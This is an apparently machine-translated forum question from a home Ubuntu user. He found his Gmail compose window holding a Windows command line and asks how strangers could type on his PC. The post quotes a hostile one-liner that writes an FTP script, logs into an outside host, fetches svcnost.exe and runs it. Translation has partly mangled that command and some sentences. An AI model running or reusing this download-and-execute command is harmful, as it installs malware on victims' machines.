我的家用PC通常是打开的,但显示器却关闭了。今天傍晚,我下班回家后,发现了一次看上去很像黑客尝试的事情:在我的浏览器中,我的Gmail已打开(就是我),但是它处于撰写模式,并且该TO字段中包含以下内容:
md / c echo open cCTeamFtp.yi.org 21 >> ik&echo用户ccteam10 765824 >> ik&echo二进制文件>> ik&echo get svcnost.exe >> ik&echo bye >> ik&ftp -n -v -s:ik&del ik &svcnost.exe&exit echo您已拥有
在我看来,这看起来像Windows命令行代码,并且代码的md开头加上Gmail处于撰写模式这一事实,很明显表明有人试图运行cmd命令。我猜我很幸运,实际上我没有在此PC上运行Windows,但是我有其他人可以运行。这是我第一次发生这样的事情。我不是Linux专家,当时我没有运行除Firefox之外的任何其他程序。
我绝对确定我没有写这个,并且没有人在我的电脑前。另外,我最近将自己的Google密码(以及所有其他密码)更改为类似的密码,vMA8ogd7bv所以我认为没有人入侵了我的Google帐户。
刚刚发生了什么?当不是老太婆运行恶意软件的老Windows计算机而不是最近安装的新Ubuntu时,有人如何在我的计算机上敲击键盘?
更新:
让我解决一些要点和问题:
- 我在奥地利的乡下。我的WLAN路由器运行WPA2 / PSK以及不在词典中的中等强度密码。必须是蛮力的,距离这里不到50米;它不太可能被黑客入侵。
- 我使用的是USB有线键盘,因此再也不太可能有人可以入侵它。
- 当时我没有使用计算机。我在工作时只是在家里闲逛。这是一台安装在显示器上的台式计算机,因此我很少关闭它。
- 这台机器只有两个月大,只能运行Ubuntu,而且我没有使用奇怪的软件或访问奇怪的网站。主要是Stack Exchange,Gmail和报纸。没有游戏。Ubuntu将保持最新状态。
- 我不知道正在运行任何VNC服务;我当然还没有安装或启用它。我也没有启动任何其他服务器。我不确定默认情况下是否在Ubuntu中运行任何程序吗?
- 我知道Gmail帐户活动中的所有IP地址。我相当确定Google不是入门工具。
- 我找到了“ 日志文件查看器”,但不知道要查找什么。救命?
我真正想知道的是,真正让我感到不安全的是:互联网上的任何人如何在我的计算机上生成击键?我如何才能避免这种情况,而不必全神贯注呢?我不是Linux极客,而是父亲,他对Windows迷恋了20多年,对它感到厌倦。在过去的18年多的在线时间里,我从未亲自看到过任何黑客尝试,因此这对我来说是新的。
password:-)